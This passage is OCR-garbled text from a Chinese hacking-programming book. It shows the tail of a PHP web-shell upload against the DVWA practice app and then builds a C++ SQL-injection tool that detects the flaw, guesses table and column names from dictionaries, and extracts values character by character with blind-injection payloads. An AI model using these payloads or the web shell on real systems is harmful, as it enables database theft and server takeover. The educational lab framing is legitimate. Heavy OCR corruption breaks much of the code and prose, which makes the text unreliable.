frmrdata; name= Uploaded"; flename="cmd.php" 
peg 


TT'emd']) 8& lempty($_GET'cmd']) ? $_GETI cmd] : "; 


< 





图 9-41 发 送 木马 数据 包 上 传 木马 


该 木马 发 送 程 序 比 较 简 陋 ， 只 是 简单 地 提交 了 对 Web 服务 器 请 求 的 数据 包 。 开发 一 个 较 
为 通用 的 木马 上 传 工具 ， 就 不 能 这 么 偷懒 了 。 首 先 ， 需 要 提取 出 存在 上 传 漏洞 的 地 址 ， 比 如 
笔者 测试 的 DVWA 程序 上 传 漏洞 的 地 址 是 “/dvwa-1.9/vulnerabilities/upload/”， 因为 每 个 系统 
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存在 上 传 漏洞 的 地 址 是 不 相同 的 , 因此 漏洞 的 地 址 必须 能 够 接收 用 户 的 输入 。 接 着 提取 HTTP 
请 求 头 部 中 的 “Cookie” 部 分 ， 因 为 上 传 木马 时 可 能 需要 登录 系统 以 后 才能 进行 上 传 ， 但 是 
为 什么 发 包 的 时 候 可 以 ， 因 为 数据 包 中 有 COOKIE， 因 此 必须 要 能 让 用 户 输入 “cookie”， 因 
为 一 般 的 上 传 漏洞 可 能 是 论坛 、 博 客 等 系统 ， 因 此 用 户 可 以 自行 登录 后 ， 将 cookie 复制 出 来 
并 粘贴 到 程序 中 。 然 后 还 有 木马 的 内 容 需 要 用 户 自 定义 ， 那 么 程序 界面 上 也 需要 留 下 输入 木 
马 的 文本 框 ， 可 以 直接 输入 木马 的 代码 ， 也 可 以 直接 让 用 户 输入 木马 的 目录 ， 然 后 让 程序 从 
文件 中 把 木马 代码 读 出 。 有 的 上 传 漏洞 能 够 让 用 户 去 控制 上 传 木马 后 所 在 的 目录 ， 那 么 还 要 
给 用 户 一 个 可 以 设置 上 传 位 置 的 输入 框 。 好 了 ， 通 用 上 传 木马 的 程序 基本 就 需要 这 样 了 ， 对 
此 感 兴趣 的 读者 可 以 自行 实现 。 

(3) SQL 注入 工具 

SQL 注入 的 产生 是 由 于 程序 没有 对 外 部 的 输入 进行 过 滤 ， 从 而 导致 被 精心 构造 的 外 来 数 
据 被 注入 到 SQL 语句 中 被 执行 而 产生 的 黑客 攻击 。 本 节 针 对 DVWA 编写 一 个 简单 的 用 于 辅 
助 SQL 注入 的 工具 ， 在 编写 工具 的 同时 可 以 从 原理 和 本 质 上 来 了 解 SQL 注入 的 形成 ， 虽 然 
书 中 介绍 的 原理 已 经 很 难 在 现实 中 找到 ， 但 是 就 Web 安全 入 门 阶 段 对 于 SQL 注入 的 学 习 而 
言 ， 它 依然 是 个 经 典 ， 除 了 DVWA 以 外 ， 还 有 许 许 多 多 不 同 的 Web 安全 练习 平台 ， 无 论 是 
哪 种 Web 安全 练习 平台 都 少不了 最 基础 的 练习 , 不 入 门 怎么 谈 提高 呢 ? 而 真正 的 提高 又 岂 是 
看 书 能 真正 掌握 的 呢 ? 

在 拿 到 一 个 网 站 要 进行 注入 时 ， 需 要 检测 确认 该 网 站 是 否 存 在 已 知 的 SQL 注入 的 漏洞 ， 
那么 就 需要 有 进行 判定 是 否 存 在 SQL 注入 漏洞 的 方式 。 而 SQL 注入 的 漏洞 常见 有 字符 型 注 
入 、 数 值 型 注入 和 搜索 型 注入 。 虽 然 注 入 被 分 为 了 3 类 ， 但 是 它们 的 检测 思路 是 相通 的 ， 下 
面 举例 介绍 一 下 。 

在 登录 某 个 Web 系统 时 ， 首 先 会 要 求 输 入 自己 的 用 户 名 和 密码 ， 然 后 提交 给 Web 服务 
器 ，Web 服务 器 接收 请 求 后 转交 给 Web 脚本 去 处 理 请 求 ， 接 着 Web 脚本 会 用 得 到 的 用 户 名 
和 密码 去 数据 库 中 匹配 是 否 存 在 该 用 户 名 ， 且 该 用 户 名 的 密码 是 否 正 确 。 在 数据 库 中 进行 查 
询 的 语言 就 叫 作 SQL， 即 结构 化 查询 语言 。 对 于 进行 用 户 名 和 密码 匹配 的 SQL 脚本 大 体 如 
下 所 示 : 


Select * from user where username='admin’' and password='123456" 

在 上 面 的 SQL 语句 中 ， 就 是 要 在 user 表 中 去 匹配 是 否 存在 用 户 名 为 admin 和 密码 为 
123456 的 记录 。 注 意 ， 这 里 的 admin 和 123456 都 是 用 引号 引 住 的 ， 说 明 这 两 个 值 是 字符 型 。 

平时 在 浏览 网 页 时 ， 可 能 会 看 到 如 下 的 连接 : 

http://localhost/article,.php?id=1 

在 这 个 URL 中 ，article.php 是 请 求 的 页 面 ，id=1 是 提交 给 article.php 的 参数 。 而 这 个 参 
数 有 可 能 是 数值 型 ， 也 有 可 能 是 字符 型 ， 用 该 id 在 数据 库 中 查询 可 能 是 以 下 两 种 情况 。 


Select * from article Where id = 1 


上 面 的 是 数值 型 ， 对 于 字符 型 是 如 下 的 查询 语句 : 


Select * from article Where id = "1 

最 后 再 说 一 下 搜索 型 ， 搜 索 型 一 般 是 用 在 搜索 栏 的 位 置 上 ， 用 于 输入 某 个 关键 字 然 后 在 
数据 库 中 对 该 关键 字 进 行 匹 配 ， 比 如 要 搜索 所 有 以 “编程 入 门 ”为 标题 的 文章 ， 可 能 的 查询 
语句 如 下 : 


Select * from article Where title 1ike '$% 编 程 入 门 %' 
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在 做 搜索 型 查询 时 ， 在 输入 的 关键 字 的 两 边 有 “%”， 它 用 于 匹配 任何 字符 ,而 且 查 询 时 
不 再 使 用 “=”， 而 是 使 用 “like” 关 键 字 。 

这 就 是 3 种 不 同 的 查询 方式 , 而 在 实际 写 SQL 的 时 候 很 少 有 人 描述 字符 型 查询 、 数 值 型 
查询 的 ， 因 为 编写 SQL 的 人 知道 查询 的 值 是 什么 类 型 ， 如 果 是 数值 就 直接 写 ， 如 果 是 字符 则 
在 字符 的 两 侧 加 单 引号 。 但 是 对 于 在 进行 注入 检测 时 ， 是 哪 种 类 型 就 需要 靠 猜测 了 。 

接着 介绍 Web 脚本 是 如 何 让 SQL 去 数据 库 中 进行 查询 的 ， 以 下 面 这 个 URL 进行 说 明 。 


http://localhost/article.php?id=1 


如 果 这 里 的 id 是 字符 型 ， 那 么 在 Web 脚本 语言 中 可 能 是 如 下 代码 (以 PHP 语言 说 明 )。 
$id = $_ GETIL'id']; 

S91l = Moalect "FIO artiele where a= WW oo Sad Ms 

Mysql_query ($sq1); 


首先 获得 id， 接 着 将 id 进行 拼接 ， 注意 在 id 前 后 都 有 一 个 单 引 号 ， 拼 接 好 以 后 就 和 前 
面 介绍 的 语句 一 样 了 。 如 果 是 数值 型 的 话 ，PHP 语言 的 代码 如 下 : 


[性 囊 cio9 放 四 web 区 。 
Ssql = "select * from article Where id = ” . $id; 
Mysql auery ($sql);} 


注意 看 ， 在 拼接 查询 语句 时 是 没有 单 引号 的 。 

基础 部 分 已 经 差不多 了 ， 那 么 来 说 说 检测 是 否 存 在 SQL 注入 的 方法 ， 仍 然 使 用 上 面 的 
URL 来 介绍 ， 如 何 判 断 article.php?id=1 这 个 URL 是 否 存 在 注入 呢 ?” 如 果 是 数值 型 查询 ， 那 
么 只 要 在 id=1 后 面 跟 一 个 and 1=1 就 可 以 了 ，URL 如 下 : 


http://localhost/article.php?id=1 and 1=1 


如 果 是 字符 型 查询 ， 那 么 只 要 在 id=1 后 面 跟 一 个 "and '1'='1 就 可 以 了 ，URL 如 下 : 


http://localhost/article.plip?id=1' and '1'='1 

为 什么 要 加 个 and 呢 ， and 后 面 为 什么 是 1=1 呢 ? 因为 and 是 逻辑 与 关系 , and 前 面 的 表 
达 式 为 真 ， 且 and 后 面 的 表达 式 也 为 真 时 ，and 表达 式 为 真 。 那么 id=1 一 般 都 是 真 的 , 而 1=1 
也 肯定 是 真 的 , 因此 id=1 and 1=1 也 是 真 的 , 那么 在 数据 库 中 仍然 会 把 正确 的 数据 进行 返回 ， 
也 就 是 说 id=1 和 id=1 and 1=1 返回 的 内 容 应 该 是 一 样 的 。 字 符 型 中 的 单 引 号 是 用 来 在 进行 
SQL 字符 串 拼 接 时 使 用 的 ， 读 者 可 以 自行 查看 字符 型 的 查询 代码 前 面 的 SQL 语句 。 

但 是 只 通过 and 1=1 是 无 法 说 明 问 题 的 ， 还 需要 另外 一 个 and 表达 式 来 进行 测试 ，URL 
如 下 : 


http://localhost/article.php?id=1 and 1=2 

判断 完 and 1=1 以 后 ， 就 需要 判断 and 1=1， 因 为 1=2 是 假 ， 因 此 id=1 and 1=2 的 and 表 
达 式 肯定 为 假 ， 当 为 假 的 时 候 则 无 法 返回 正确 的 内 容 ， 也 就 是 说 id=1 and 1=2 是 无 法 返回 与 
id=1 相同 的 结果 的 。 

因此 ， 在 进行 SQL 注入 检测 的 时 候 ， 需 要 根据 不 同 的 类 型 来 构造 不 同 的 检测 判断 ， 当 
and 1=1 返回 的 内 容 与 原 内 容 相 同 ， 且 and 1=2 返回 的 内 容 与 原 内 容 不 同时 ， 基 本 就 可 以 判定 
是 存在 SQL 注入 的 了 。 

在 DVWA 中 对 上 面 的 原理 进行 演示 ， 将 DWVA 的 安全 级 别 设置 为 “Low”， 然 后 进入 
“SQL Injection ”模块 ,在 界面 中 输入 1,， 并 进行 提交 , 返回 的 页 面 被 称 为 A 页 面 , 如 图 9-42 
所 示 。 

再 输入 Tand'='1， 这 里 是 字符 型 的 注入 ， 是 笔记 已 经 测试 过 的 ，DVWA 返回 结果 如 
9-43 所 示 ， 该 页 面 被 称 为 B 页 面 。 
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User ID User ID:| 


ID; 1 
First name: admin 
Surnamne: adnin 


ID, 1 and 二 = 一 1 
First name: adnin 
Surname admin 





图 9-42 输入 User ID 为 1 的 输出 图 9-43 输入 UserID 为 了 and'1'='1 的 输出 


再 输入 1 and'l=2，DVWA 返回 结果 什么 都 没有 ， 这 个 什么 都 没有 返回 的 页 面 是 C 页 面 。 
在 前 面 的 介绍 中 说 ， 判 断 是 否 存在 注入 的 判定 条 件 是 ，A 页 面 的 内 容 和 B 页 面 的 内 容 相同 ， 
而 B 页 面 的 内 容 和 A 页 面 的 内 容 不 相同 。 但 是 从 返回 页 面 来 看 A 页 面 和 B 页 面 也 有 少许 差 
异 ， 但 是 差异 并 不 在 查询 后 的 返回 的 内 容 上 ， 而 是 将 输入 的 内 容 显 示 到 页 面 上 以 后 又 导致 有 
了 差异 ,那么 A 页 面 和 B 页 面 不 完全 相同 了 ， 如 何 进行 判定 呢 ? 既然 只 是 部 分 不 相同 了 , 那 
么 还 是 不 影响 判定 的 ， 可 以 匹配 页 面 的 相似 度 ， 也 可 以 去 匹配 页 面 上 的 特征 码 。 匹 配 相 似 度 
可 能 稍微 麻烦 ， 但 是 匹配 特征 码 就 相对 简单 了 ， 只 要 能 查询 出 结果 ， 就 会 在 页 面 上 返回 “First 
name” 和 “Surname”， 那 么 就 用 页 面 上 的 “First name” 来 作为 特征 码 ， 判 定 条 件 就 变 了 ,在 
A 页 面 上 有 “First name”，B 页 面 上 也 有 “First name”， 且 CC 页 面 上 没有 “First name” 那 么 
就 判定 该 页 面 存 在 SQL 注入 。 

在 “SQL Injection ”模块 中 提交 了 数据 以 后 ，URL 的 地 址 如 下 : 


http://localhost/dvwa=li.9/vulnerabilities/sqli/?id=1&Submit=Submit# 
地 址 栏 的 数据 是 ?id=1&Submit=Submit 这 样 的 ,经 过 测试 , 如 果 地 址 栏 没有 Submit=Submit 
则 提交 后 会 有 问题 ， 但 是 它 的 存在 不 利于 测试 ， 那 么 修改 该 URL 地 址 如 下 : 


http://127.0.0.1/dvywa-l.9/vulnerabilities/sqli/?Submit=Submit&id=1 
通过 这 样 既 保 留 了 Submit=Submit， 又 可 以 利用 id=1 进行 注入 测试 了 。 
有 了 上 面 的 思路 以 后 ， 就 来 看 一 下 接 下 来 要 编写 的 程序 ， 如 图 9-44 所 示 。 
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URL 地 址 1127.0.0.1/dvwa-l.9/vunerablities/saif 7submit=Submitad=1 | 3 | 
特征 码 [Frst name 





注入 类 型 ; 。 “字符 型 个 数值 型 个 搜索 型 


测 式 者 值 型 
http://127.0.0.1/dwwa-1.9/vunerabiitias/saW/ ?Subrit=Submitsud=1f 不 存在 ] 


子 付 
http://127.0.0.1/dvwa-1.9/vuinerabities/sqWy?5ubmt=Submitaid=1{ 存 在 ] 





图 9-44 SQL 注入 检测 程序 


在 图 中 先 将 需要 检测 的 URL 地 址 填 入 , 然后 填 入 特征 码 ， 选择 好 注入 的 类 型 ,然后 单 击 
“测试 ” 就 会 看 到 测试 的 情况 。 下 面 来 看 单 击 “ 测 试 ” 按 钮 后 的 代码 ， 代 码 如 下 : 


void CSQLInjectToolsDlg: ;OnBnClickedButtonl () 
{ 


// TODO: 在 此 添加 控件 通知 处 理 程序 代码 
CSstring strUrl; 





— 
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GetD19ItemText (IDC EDIT1, strUrl); 


GetDlgItemText (IDC EDIT2, m strSign); 


DWORD dwServiceType; // 服务 类 型 

CString strServer; // 服务 器 地 址 

CString strObject; // URL 指向 的 对 象 
INTERNET PORT nPort; // 端口 号 
AfxParseURL(strUrl, dwServiceType, strServer, 
Checklinject(strServer, strObject, npPort); 


StrIObJeGt: npPortys 


} 
获得 需要 测试 的 注入 地 址 ， 以 及 获得 特征 码 ， 然 后 在 Checklnject 函数 中 进行 检测 ， 
Checkinject 函数 代码 如 下 : 


void CSQOLInjectToolsDlg::CheckIiniject (CString strServer, CString strObject, 


PORT npPort) 


{ 


CString strUrl: 
strUrl = "http://" + strServer + strObiject; 


Switch ( m nSsel ) 
. case 1: 
m ScanList,.1InsertIitem(m ScanList.GetItemCount(), 
if ( Check(strServer, 
: strUrl = /StrUry + "[ 有 在 ] "3 
a 
; strUri = SEO ho 不 存在 ] my 


} 
break; 
} 
Case 2: 
{ 
m ScanList;IinsertIitem(m ScanList.GetIitemCount(), 
if ( Check(strServer, 
{ 
StrUrli = StrUrl + vi 存在 ]”; 
} 
else 


{ 


Hl 


strgrl = /StrUrl + "[ 不 存在 ] "; 
} 
break; 
} 
case 3; 
{ 
m ScanList.InsertIitem(m ScanList,GetItemCount(), 
if ( Check(strServer, 
{ 
SEE Sstrurl + [HE] 
} 
else 
{ 
StrUrl = strUrl + "[ 不 存在 ] 
} 
break; 
} 
default: 
{ 
AfxMessageBox ("请 选择 测试 类 型 1 1")，; 


INTERNET 


"测试 字符 型 ") ; 


strObject, pCharText[0], pCharText[1]) ) 


"测试 数值 型 ") ; 


strObject, pNumText[0], pNumText[1]) ) 


"测试 搜索 型 ") ; 


strobject, pSearchText[0], pSearchText[1]) ) 
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} 


break; 
} 


mscanList.Insertiteml(m ScanlList.GetitemCount(), strUrl); 
// closesocket (m sock); 





在 代码 中 ， switch 用 来 判断 选择 的 是 哪 种 注入 的 测试 类 型 ， 然 后 具体 的 判断 实现 在 Check 
函数 中 ，Check 函数 的 代码 如 下 : 


BOOL COO0INTI etn pDlio icnecek (Cind sr err rine se rt coer sr 
OStringnstr yl) 


{ 


} 





BOOTbDReSE EALSD: 


* 


char szSendPacket[1024] } 
入 


char szRecvPacket [0x2048] 
nitro tr yr 
m sock = socket (PF LINET, SOCK_ STREAM, IPPROTO TCP); 


人 
= 1{ 


sockaddr in ServerAddr = { 0 };» 
ServerAddr.sin family = AF INET; 
ServerAddr.sin port = htons (80) 7 
ServerAddr.sin addr,Ss un,s addr = inet addr (strServer);} 


cormnect (m_ sock, (const sockaddr *)&ServerAddr, sizeof (ServerAddr)); 
// 测试 真 

Stryrl = trO3Iect Tatells 

HttpGet (szSendPacket, strUrl,.Getpanffer(0), strServer,. Getbuffer(0) 


send(m sock, szSendPacket, strlen(lszSendPacket), 0); 
zecv(m sock, szRecvPacket, 0x2048, 0); 
CString strhacket, li = "sRecvbacket, 


closesocket (m sock); 


m sock = socket (PF INET, SOCK STREAM, IPPROTO TCP) 7 

connect (m_sock, (const sockaddr *)&ServerAddr, sizeof (ServerAddr)); 
/7 测试 假 

BtLIUrL Ns Onject sta 

ZeroMemory (szSendPacket, 1024); 

ZeroMemory (szRecvPacket, OQ0x2048)? 

HttpGet (szSendPacket, strUrl.GetBuffer(0), strServer.GetBuffer(0))'’” 


send (m sock, szSendPacket, strlen(szSendPpacket), 0); 
recvl(m sock, szRecvpacket, Ox2048, 0); 


CString strPhacket' 12 = szRecvPbacket; 

closesocket (m sock); 

i ("StrPacket ll, Fina(m strsign) t= rE ge Stepacket 12 ind (moteSign) == =] ) 
人 


， 


DRet = TRUE; 


return bRet; 


首先 连接 Web 服务 器 ， 对 服务 器 发 送 数据 包 ， 然 后 接收 服务 器 返回 的 数据 包 ， 发 送 的 包 


是 对 Web 服务 器 的 GET 请 求 ， 而 接收 的 数据 包 就 是 Web 服务 器 返回 的 网 页 的 内 容 。 第 一 次 
发 送 的 是 永 真 的 1=1， 第 二 次 发 送 永 假 的 1=2， 然 后 分 别 在 两 个 包 中 查找 特征 码 即 可 。 发 送 





的 数 和 


居 包 的 函数 是 HttpGet 函数 ， 该 函数 的 定义 如 下 : 


veoid CSQLInijectioolsDlg::HttpGet(char* strGetPpacket, char* strUrl, char* strHosty) 
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weprintf(streetPacket, .GET Ss HErR/Le LN Na 
vuHOSt: 天 SNENI9 
"AcCept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp, 
*/* ag=0 aNFNa" 
JUpgrade ~-Insecure“ Requests: 1NF Nn 
"User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/50.0.2661.102 Safari/537.36\r\n" 
Referer: hEtp://Localhost/dvwa-l. 9/vulinerabilities/sgLi/ NN 
"Accept-Encoding:; gzip, defilate, sdch\r\n" 
"Accept-~Language: zh-CN,zh;q=0;8\r\n" 
"Cookie: security=Low; pygv pvi=8928542720; Hm lvt_ 0a8bO0d0d0f05ch8727db5ce8d 
TIE0dc08=15051189777 a5787 times=1; a3564 times=1; pageNo=1l; pageSize=30; 
Hm lvt 82116c626a8d504a5c0675073362ef6f=1508373269,1508719861,1508806033, 
1508821087; PHPSESSID=jn0pc2a4eubcd400m4bhé6nv1n2\r\n" 
Conneetion: elLoseNENNENO strdrl, strHOStE),; 


} 
发 送 的 数据 包 是 从 Burp 中 拦截 到 的 数据 包 ， 修 改 包 请 求 的 URL 和 请 求 主机 即 可 。 最 后 


给 出 代码 中 对 3 种 注入 检测 的 定义 ， 定 义 如 下 : 
XA 字符 型 
char *pCharText[] = 
{ 
"$27+and+%271%27= 名 271", 
"27+and+$s271%S27=%272" 


}; 
// 数值 型 
char *pNumText![] = 


{ 
"and Ed 
“2 


} 
/7 搜索 型 
char *pSearehText[] = 
{ 
"25%$27+and+1=1]+and+%27%25%27=%27%25", 
"ng25%27+tand+1=2+andt®e27%25%27=%27%25" 
7 


在 请 求 的 URL 中 ， 空 格 使 用 “+” 代 替 ，%27 表示 单 引 号 ，%25 表示 %。 在 URL 中 有 
很 多 字符 出 现 以 后 是 需要 经 过 编码 的 ， 不 过 好 在 这 里 只 是 使 用 ASCII 码 进行 了 表示 ， 读 者 在 
写 的 时 候 需 要 注意 。 

上 面 是 关于 检测 的 部 分 ， 下 面 就 要 来 介绍 关于 利用 的 部 分 。 利 用 的 部 分 也 类 似 检测 部 分 
的 原理 ， 下 面 介绍 如 何 猜 解 数据 库 中 的 表 名 。 判 断 数 据 库 中 有 哪些 表 ， 这 个 也 需要 用 到 字典 。 
这 个 字典 可 以 自己 收集 ， 同 样 也 可 以 在 现 有 的 软件 中 找 一 些 字 典 来 自己 使 用 。 

猜 解 数据 库 中 的 表 名 ， 同 样 也 是 用 到 SQL 语句 ， 还 是 以 DVWA 安全 级 别 为 “Low?” 的 
“SQL Injection” 模 块 来 演示 ， 如 图 9-45 所 示 。 

Exists 在 SQL 中 用 来 检测 括号 中 的 查询 语句 是 User IG | 
否 返 回 结 果 集 ， 上 面 的 查询 语句 exists(select * 位 om WD: and exists (eelont 4 fron veers) and 1 
users) 中 ，exists 要 判断 select * from users 是 否 返 回 Smame stnin 
了 结果 集 ， 返 回 了 就 为 真 ， 没 返回 就 为 假 ， 至 于 返 
回 什么 结果 集 并 不 重要 。 由 此 可 以 看 出 exists 返回 
的 是 一 个 逻辑 值 ， 因 此 在 判断 表 名 是 否 存 在 时 就 是 这 么 判断 的 。 上 面 构造 的 查询 语句 如 下 : 


Seleet FHFStname, surname from 家 SY where dd = "I" and Exists (eleat * Erom users) and 
11t=711 


在 exists 括号 中 的 users 就 是 要 猜 解 的 表 名 ， 当 表 名 存在 的 时 候 就 会 有 结果 集 返 回 , 那么 
































图 9-45 ”SQL 注入 对 表 名 的 猜 解 
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exists 为 真 ， 整 个 and 表达 式 成 立 ， 则 页 面 会 返回 与 正常 页 面相 同 的 页 面 ， 或 者 返回 带 有 特征 
码 的 页 面 。 猜 解 表单 的 代码 如 下 : 


void CSQLInijectToolsDlg: :OnBnClickedButton2() 


{ 
// TODO: 在 此 添加 控件 通知 处 理 程序 代码 
CString StrUrl? 
GetDligltemText (IDG -EDIT StrUrl); 
GetDlgItemText (IDC EDIT2, m strSign); 


DWORD dwServiceType; /7 服务 类 型 


Cetring strServer; // 服务 器 地 址 
CString strObject; //_URL 指向 的 对 象 
INTERNET PORT nport; // 端口 号 


AfxParseURL(strUrl, dwServiceType, strServer, strObject, nport); 


int nTable = sizeof (tables) / MAXBYTE; 
m ScanList.InsertIitem(m ScanList.GetItemCount(), "开始 猜 表 名") ; 
£8 { tnt = "01 < nTabler d+ } 
{ 
CLELING Stryrlels 
// and (select count(*) from user) > 0 
strUr] 1.Format ("%s$%$27+andtexistssS$%28select+*+fromt+Sss$29+and+%ss271%$27=%%271", 
strObject, tables[il); 
m sock = socket'(PF INET, SOCK STREAM, IPPROTO TCP)， 


sockaddr in ServerAddr = { 0 }; 

ServerAddr.sin family = AF INET; 

ServerAddr.sin port = htons (80); 

ServerAddr,sin addr.s un.S addr = inet addr (strServer); 
connect (m sock, (const sockaddr *) &ServerAddr, sizeof (ServerAddr)); 


char szSendPacket[1024] = { 0 }; 
char szRecvPacket[0x2048] = {0 }: 
HttpGet (szSendPacket, strUrl]l 1.GetBuffer(0), strServer.GetBuffer (0)); 


send(m sock, szSendPpacket, strlen(szSendPpacket), 0); 
recv(m sock, szRecvPacket, Ox2048, 0); 


cstring strphacket; 

strPacket = szRecvpacket; 

CString tab'= tables!lil]? 

if ( strPacket.Find(m strSsign) != =1 ) 


{ 
tab = "tab + of 存在 该 表 ] "7 
} 


m ScanList.InsertIitem(m ScanList.GetIitemCount(), tab); 


closesocket (m sock); 
} 
m ScanList,.InsertItem(m ScanList.GetItemCount(); "结束 猜 表 名 "); 


} 

上 面 的 关键 在 该 句 代 码 : 

strUrl 1.Format ("Ss$$27+andtexists$®%$28selecti+*+fromt+$Ss$S$S29+andt+$S$S271$s%E27=$S$271", 
strQbject, tables[i]); 


该 代码 用 来 拼接 请 求 的 URL， 其 中 %28 和 %29 是 分 别 代表 了 “(” 和 “)”， 这 两 个 字符 
也 不 能 出 现在 URL 中 , 因此 使 用 ASCII 码 蔡 换 。 然后 在 其 中 不 断 地 用 tables 数组 中 保存 的 表 
字典 来 猜测 ， 表 字典 的 定义 如 下 : 

/7 猜 表 名 


char tables[] [MAXBYTE] = { "admin", "manage", "Users", "user", "guestbook", "note"}; 


程序 运行 后 的 效果 如 图 9-46 所 示 。 





© 











URL 地 址 [27.0.0.1/ dwwa-1.9/vunerabities/ so/ ?Submit=Submieid=1 测 坡 | 
特征 码 [Frstname 


注入 类 型 : 。 字符 型 。 数值 型 个 搜索 型 


图 9-46 SQL 注入 猜 解 表 名 


猜 解 完 表 名 接 下 来 就 要 猜 解 表 中 的 列 名 ， 猜 解 列 名 如 图 9-47 所 示 。 


URL 址 [127.0.0.1/dvwa-1.9/vunerabities/sal ?Submit= Submitaid=1 测 泛 猜 未 名 
特征 码 [Frst name sers 猜 字段 
注入 天 型 个 字 行 型 ”有 数值 型 个 搜索 型 





T 





note 
结束 猜 表 名 
len 
usef[ 存 在 读 列 ] 


Usemame 
pass 


pwd 
password[ 存 在 该 列 ] 
半 束 靖 列 名 


图 9-47 SQL 注入 猜 解 列 名 


猜 解 列 名 的 原理 依然 类 似 ， 代 码 如 下 所 示 : 
char columns[] [MAXBYTE] = { "id", “user", "username", "pass", "pwd", 
void CSQLInjectToolsDlg: :OnBnClickedButton3() 


{ 
// TODO; 在 此 添加 控件 通知 处 理 程序 代码 
Cstring strTable; 
CSstring strUrl? 


GetDlgItemText (IDC EDIT1, ‘strUrl); 
GetD1gItemText (IDC_EDIT2, m strSign); 
GetDigitemText (IDC EDIT3, strTable); // 获取 猜 解 表 名 


DWORD dwSserviceType; // 服务 类 型 
CString strServer; -// 服务 器 地 址 
CString strObject; /7 URL 指向 的 对 象 
INTERNET_PORT nport; // 端口 号 


AfxParseURL (strUrl, dwServiceType, strServer, strObject, npPort); 


int nColumns = sizeof (columns) / MAXBYTE; . 

m ScanList,Insertitem(m ScanList.GetItemCount (), "开始 猜 列 名 "); 
for ( int 1 = 0; < nCcolumns? i++ ) 

{ 








"password"}; 
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GStringl strUrle ly 
// and (select count (id) from user) > 0 


第 strUrl 1.Eormat ("%s$%27+and+s$%28select+countS%s28%s$%$29+fromt+sss$s29>0+andt+ 
9 SS%271%%27=%%271", strObject, columns{[i], strTable); 
章 m_sock = socket (PF INET, ‘SOCK STREAM, IPPROTO. TCP); 
sockaddr in ServerAddr = { 0 }; 
黑 ServerAddr .sin family = AF INET; 
客 ServerAddr.sin port = htons (80) 7 
编 ServerAddr.sin addr,s un;S addr = inet addr (strServer); 
程 connect (m sock, (const sockaddr *)&ServerAddr, sizeof (ServerAddr)); 
衣 char szSendPacket[1024] = { 0 }; 
char szRecvPacket [0x2048] = { 0 1}; 
HttpGet (szSendPacket, strUrl 1.GetBuffer(0), strServer.GetBuffer(0)); 
a 


send(m sock, szSendPacket, strlen(szSendPacket), 0); 
recv(m sock, szRecvPpacket, 0x2048, 0); 


CSstring strPacket; 

strPacket = szRecvPacket; 

CString col = columns [i];? 

4£f ( strpacket ,Find(m strSsign) {= =1 ) 


{ 
col = col + "[ 存 在 该 列 ] "; 
. 


m ScanList.TInsertitem(m ScanList.GetIitemCount(), ColL) 7 


closesocket (m_sock); 
} 
m ScanList,InsertIitem(m ScanList.GetItemCount (), "结束 猜 列 名 "); 


} 
猜 解 列 名 的 关键 语句 如 下 所 示 : 


1' and (select count (password) from users)>0 and ‘1'="'1 

猜 解 列 名 时 ， 不 断 地 替换 count 函数 括号 内 的 字段 名 ， 当 该 字段 存在 值 时 会 返回 一 个 大 
于 0 的 值 ， 使 得 and 表达 式 成 立 ， 于 是 返回 带 有 特征 码 的 页 面 。 

一 般 情 况 下 ， 猜 解 完 列 名 ， 就 该 猜 解 列 里 面 的 值 了 ， 这 里 给 出 关键 的 构造 SQL 的 语句 。 
猜 解 列 里 的 值 ， 仍 然 是 使 用 暴力 破解 ， 但 是 首先 要 知道 列 里 的 值 的 长 度 ， 计 算 长 度 的 SQL 语 
句 如 下 : 


1 and (select length (user) from users limit 0,1)=5 and ‘1'='1 

首先 length 函数 是 用 来 计算 长 度 的 函数 , 这 里 length(user) 是 用 来 计算 user 字段 中 值 的 长 
度 ，user 列 中 可 能 不 会 只 有 一 个 值 ， 而 是 会 有 多 个 值 ， 但 是 判断 时 只 需要 取 一 条 记录 ， 因 此 
取 了 第 一 条 记录 ， 使 用 的 语句 是 limit 0,1， 也 就 是 从 第 0 条 记录 开始 取 1 条。 取出 来 的 记录 
如 果 为 5 则 返回 真 ， 如 果 不 是 5 则 返回 假 。 

因此 ， 构 造 该 语句 时 大 体 如 下 : 

strUrl .FEozmat( and (Select length (字段 名 ) from 表 名 limit %s,1)=%d and ‘1'='1",n, len); 

其 中 表示 第 几 条 记录 , len 表示 猜 解 的 长 度 ， 因 为 长 度 不 固定 因此 长 度 使 用 循环 变量 逐 
个 尝试 即 可 。 比 如 ， 猜 解 的 第 0 条 用 户 名 是 admin， 那 么 长 度 就 为 5， 有 了 长 度 之 后 再 使 用 如 
人 

本 : 


1 and (select ascii (mid(user, 1, 1)) from users limit 0, 1) oF and Te 


1 and (select ascii (mid(user, 2; 1)) from users limit 0; 1) = 100 and '!17"= "1 
1' and (select asctt(mid (user, 3, 1)) from users Limit 0, 4) = 109 and "lr=?1 
i and (select ascii (mid(user, 4, 1)y) from users limit 0O, 1)y = 105 and TEL 


1 and (select ascii (mid(user, 5, 1)) from users limit 0, 1) TaoQVand "ltl 
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上 面 的 97 表示 a，100 表示 d， 该 处 使 用 数字 、 大 小 写字 母 进行 替换 测试 即 可 ， 当 测试 


条 件 成 功 后 ， 测 试 下 一 个 值 ， 这 时 就 使 用 到 了 mid 函数 ，mid 函数 是 用 来 取 值 字符 串 的 子 串 和 
的 ， 因 此 猜 解 值 时 需要 双重 循环 来 进行 猜 解 。 章 
下 来 完成 判断 列 值 长 度 的 功能 ， 如 图 9-48 所 示 。 . 
客 
编 
程 
URI 由 。。 [270.0101 jnenbieysnW7SubmRSubriad=1 到 过 | 。 匡 到 | 实 
特征 得 wm 素 名 uses ” ” 靖 字 耻 例 
注入 类 型 : 个 字符 型 个 数值 型 及 搜索 型 到 名 se 稍 长 度 | 


第 几 行 记录 Pe 








图 9-48 SQL 注入 猜 解 列 值 长 度 


在 图 9-48 中 猜 解 的 是 users 表 中 第 0 条 记录 的 user 字段 (字段 就 是 列 )， 猜 解 到 的 长 度 
为 5。 下 面 看 代码 : 


void CSsQLInjectToolsDlg: :OnBnCliackeaBuELEond () 


{ 
// TODO: 在 此 添加 控件 通知 处 理 程序 代码 
CString strTable; 
CString strField; 
Catrine strUels 
CSstring strNum; 


GetDlglitemText (IDC EDIT1, strUrl); 
GetDlgItemText (IDC. EDIT2, m strSign); 


GetDlgItemText (IDC EDIT3, strTable); // 获取 猜 解 表 名 
GetDlgItemText (IDC_EDIT4, strField); // 列 名 
